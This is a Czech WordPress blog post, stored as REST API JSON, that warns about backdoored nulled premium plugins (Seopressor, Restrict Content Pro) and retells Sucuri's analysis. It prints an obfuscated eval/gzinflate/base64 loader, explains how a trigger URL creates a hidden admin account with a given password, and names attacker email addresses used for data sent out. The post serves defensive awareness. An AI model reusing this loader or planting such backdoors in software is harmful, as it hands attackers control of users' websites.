{"id":2284,"date":"2014-12-26T16:59:48","date_gmt":"2014-12-26T16:59:48","guid":{"rendered":"http:\/\/musilda.cz\/?p=2284"},"modified":"2014-12-26T16:59:48","modified_gmt":"2014-12-26T16:59:48","slug":"riziko-pri-pouziti-free-a-nulled-premium-pluginu","status":"publish","type":"post","link":"https:\/\/affinite.io\/cs\/riziko-pri-pouziti-free-a-nulled-premium-pluginu\/","title":{"rendered":"Riziko p\u0159i pou\u017eit\u00ed free a nulled premium plugin\u016f"},"content":{"rendered":"\n

P\u0159esto\u017ee je pro WordPress \u0159ada free plugin\u016f, pr\u00e9miov\u00e9 pluginy \u010dasto nab\u00edz\u00ed funk\u010dnost, kter\u00e9 pluginy zdarma nemaj\u00ed. A ur\u010dit\u011b jste ji\u017e narazili na weby, kde se daj\u00ed st\u00e1hnout zdarma.<\/p>\n\n\n\n\n\n\n\n

Podobn\u00e9 weby, je nab\u00edz\u00ed pod ozna\u010den\u00edm nulled, co\u017e znamen\u00e1 zru\u0161enou kontrolu, \u010di ochranu licence. Sta\u010d\u00ed do Google zadat „<nazev pluginu> free download“ a najdete celou \u0159adu str\u00e1nek, kde je st\u00e1hnete. Tento \u010dl\u00e1nek v\u0161ak nem\u00e1 b\u00fdt n\u00e1vodem, jak naj\u00edt podobn\u00e9 weby, pr\u00e1v\u011b naopak.<\/p>\n\n\n\n

Samoz\u0159ejm\u011b, \u017ee z\u00edskat n\u011bco hodnotn\u00e9ho zdarma, m\u016f\u017ee b\u00fdt l\u00e1kav\u00e9, ale z\u00e1rove\u0148 si mus\u00edte polo\u017eit ot\u00e1zku, pro\u010d v\u00e1m vlastn\u011b majitel\u00e9 t\u011bchto web\u016f, pluginy „nezi\u0161tn\u011b“ nab\u00edz\u00ed?<\/p>\n\n\n\n

Odpov\u011b\u010f je jednoduch\u00e1 – jejich motivac\u00ed je zisk. \u010casto si toti\u017e instalac\u00ed \u0161ablony, nebo pluginu, kter\u00fd byl v podstat\u011b ukraden, p\u0159id\u00e1te do va\u0161eho webu nev\u00edtan\u00e1 zadn\u00ed vr\u00e1tka a do syst\u00e9mu se v\u00e1m dostane nepovolan\u00e1 osoba.<\/p>\n\n\n\n

Uk\u00e1\u017eeme si n\u011bkolik p\u0159\u00edpad\u016f, kter\u00e9 na sv\u00e9m blogu zve\u0159ejnila firma Sucuri v \u010dl\u00e1nku „Unmasking free premium WordPress plugin<\/a>„.<\/p>\n\n\n\n

Seopressor<\/h2>\n\n\n\n

Tento plugin je mo\u017en\u00e9 po\u0159\u00eddit za 47 dolar\u016f, tedy za cca 500 korun. P\u0159i kontrole zdrojov\u00fdch soubor\u016f byl v souboru central.class.php nalezen n\u00e1sleduj\u00edc\u00ed k\u00f3d.<\/p>\n\n\n\n

eval (gzinflate( base64 _decode(\"NdLJlmNQAADQX8muqo6FIKZTXV0HEUKixCybPsIzBOGZHu\/ruzf9B3dxd9+\/f333Zb8DS9Ls3gtcvfImmcD7IxkBd\/\niTgbTLwPublZ2MEZ6RJB1vkD\/yYYV8OdYhuTCXwq+1882AVrOXpUJzbr507gkxWLZRYOfc5llCsyRMdIZxv+sW6N0ICq6h6Bm\/\n5us1pVADcjlCnsm5tttpIWyHnzkwyMqVJTOupEbLBCE50lcVtKnLKc999\/JlZDWRcO8yqve1TKRiND7ZXnsJBW5L0zwJVuFQMQmXgTPLNZnw\/PCObVCZ+YO56TOih0TzlIvhqgqpH+jUUgfVXVFrVPDRk6eKdDL1aNQgr2J5wB5Z0GErnQ3muWGF6ktS9a27sYinLuRjpUrQK6GktGCw+pMNqVq84FQCnQBKqUw3vjvT6B8ZyJAgDuEcimHia1660nhruAX71qNCOBjmvMw9q6DN4ukIgufPUyQNmX9ao1YPak6p96OGzSZoj86NPlkXEWnUvSBQzJouKDYxdsKoOTDeA3sxP17dWfxxs4S8HyeWkcYWsmMYieaS2TVR0RfOgw2Xygbrv6I03xIkKlQNfGUTmj4wsOgQdvailUayKYpaL8EVwG1aJTgcMufcgbogTeEAtf1pXp6EzYiru0XYPkcCT\/I6+vp623187D4+d\/+L\/QU=\" )) );\n<\/pre>\n\n\n\n
Osobn\u011b, pokud na podobn\u00fd k\u00f3d v pluginu naraz\u00edm a nen\u00ed takov\u00fd plugin pro mne nezbytn\u00fd, okam\u017eit\u011b jej odstran\u00edm. Ani nep\u00e1tr\u00e1m po tom, co zak\u00f3dovan\u00e1 \u010d\u00e1st obsahuje, vzhledem k tomu, \u017ee si nikdy nemohu b\u00fdt jist, co obsahuje. I kdyby to byl ne\u0161kodn\u00fd k\u00f3d, kter\u00fd zak\u00f3doval developer, aby mu n\u011bkdo neokop\u00edroval jeho pr\u00e1ci, m\u00e1 u mne sm\u016flu. V ofici\u00e1ln\u00edm reposit\u00e1\u0159i by se pluginy s podobn\u011b zak\u00f3dovanou \u010d\u00e1st\u00ed, nem\u011bly vyskytovat.
Ale zp\u011bt k nalezen\u00e9mu k\u00f3du. Kdy\u017e jej v Sucuri rozk\u00f3dovali, zobrazily se tyto dv\u011b funkce:<\/p>\n\n\n
\n
\"\"<\/a><\/figure><\/div>\n\n\n
Ob\u011b funkce jsou zav\u011b\u0161eny do hooku wp_head.
Prvn\u00ed, vytvo\u0159\u00ed u\u017eivatele wordpress, s administr\u00e1torsk\u00fdmi pr\u00e1vy, pokud zavol\u00e1te url, kter\u00e1 bude m\u00edt na konci „?cms=jjoplmh“.
Druh\u00e1 funkce zkontroluje, zda existuje u\u017eivatel wordpress a pokud ne, ode\u0161le informaci o webu na email thomasza@gmx.com.<\/p>\n\n\n\n
Shrnut\u00ed<\/strong>: st\u00e1hnete si nulled plugin, po nainstalov\u00e1n\u00ed ode\u0161le funkce url va\u0161eho webu na email thomasza@gmx.com, \u00fato\u010dn\u00edk zad\u00e1 do prohl\u00ed\u017ee\u010de www.vasweb.cz\/?cms=jjoplmh a t\u00edm si vytvo\u0159\u00ed u\u017eivatele wordpress s heslem gh67io9Cjm a pr\u00e1vy administr\u00e1tora.<\/p>\n\n\n\n
Restrict Content Pro<\/h2>\n\n\n\n
V tomto pluginu byl nejprve nalezen soubor sidebar.php, ve slo\u017ece includes. Jeho velikost byla 72 847 byt\u016f a k\u00f3d vypadal jako zakomentovan\u00e9 formul\u00e1\u0159e pro option pluginu. Pokud si k\u00f3d projdete – odkaz<\/a>, n\u011bkde uprost\u0159ed, najdete nezakomentovanou \u010d\u00e1st k\u00f3du, kter\u00e1 vypad\u00e1 obdobn\u011b, jako v p\u0159edchoz\u00edm p\u0159\u00edkladu:<\/p>\n\n\n
\n
\"\"<\/a><\/figure><\/div>\n\n
\n
\"\"<\/a><\/figure><\/div>\n\n\n
\u00dato\u010dn\u00edk se sna\u017e\u00ed zamezit detekci zak\u00f3dovan\u00e9ho \u0159et\u011bzce, pomoc\u00ed n\u011bjak\u00e9ho n\u00e1stroje a z\u00e1rove\u0148 se sna\u017e\u00ed, aby byl k\u00f3d p\u0159i vizu\u00e1ln\u00ed kontrole p\u0159ehl\u00e9dnut. P\u0159esto obsahuje zak\u00f3dovanou \u010d\u00e1st, kter\u00e1 n\u00e1m po dek\u00f3dov\u00e1n\u00ed vr\u00e1t\u00ed email wordpressslog@yandex.com. Funkce, stejn\u011b jako v minul\u00e9m p\u0159\u00edpad\u011b odes\u00edl\u00e1 email s informac\u00ed o url webu.
Nyn\u00ed n\u00e1m sch\u00e1z\u00ed je\u0161t\u011b druh\u00e1 funkce, kter\u00e1 vytvo\u0159\u00ed u\u017eivatele s admin pr\u00e1vy. Byla nalezena v souboru class.php, maskovan\u00e1 stejn\u00fdm zp\u016fsobem.

Proto\u017ee samy o sob\u011b, jsou takto funkce ne\u0161kodn\u00e9, \u00fato\u010dn\u00edk pozm\u011bnil hlavn\u00ed soubor pluginu, kam p\u0159idal do k\u00f3du:<\/p>\n\n\n\n
include'includes\/class.php'; include'includes\/sidebar.php';<\/pre>\n\n\n\n
T\u00edm je v\u0161e propojeno a v\u00e1\u0161 web m\u016f\u017ee b\u00fdt lehce ovl\u00e1dnut a vyu\u017eit.<\/p>\n\n\n\n
D\u00e1 se \u0159\u00edci, \u017ee tento probl\u00e9m nevznikne, pokud nebudete pou\u017e\u00edvat „ukraden\u00e9“ pluginy, nebo \u0161ablony. Bohu\u017eel, \u010dasto jsou rizika podce\u0148ov\u00e1na, nebo se str\u00e1nka tv\u00e1\u0159\u00ed natolik d\u016fv\u011bryhodn\u011b, \u017ee neznal\u00e9ho u\u017eivatele zmate. Proto, pokud m\u00e1te podez\u0159en\u00ed na \u0161kodliv\u00fd k\u00f3d na webu, pou\u017eijte n\u011bkter\u00fd z plugin\u016f v tomto \u010dl\u00e1nku 5 plugin\u016f pro detekci malware ve WordPress<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"
P\u0159esto\u017ee je pro WordPress \u0159ada free plugin\u016f, pr\u00e9miov\u00e9 pluginy \u010dasto nab\u00edz\u00ed funk\u010dnost, kter\u00e9 pluginy zdarma nemaj\u00ed. A ur\u010dit\u011b jste ji\u017e narazili na weby, kde se daj\u00ed st\u00e1hnout zdarma.<\/p>\n","protected":false},"author":1,"featured_media":1775,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[232,264],"class_list":["post-2284","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-bezpecnost-wordpressu","tag-malware","tag-nulled"],"_links":{"self":[{"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/posts\/2284"}],"collection":[{"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/comments?post=2284"}],"version-history":[{"count":0,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/posts\/2284\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/media\/1775"}],"wp:attachment":[{"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/media?parent=2284"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/categories?post=2284"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/affinite.io\/cs\/wp-json\/wp\/v2\/tags?post=2284"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}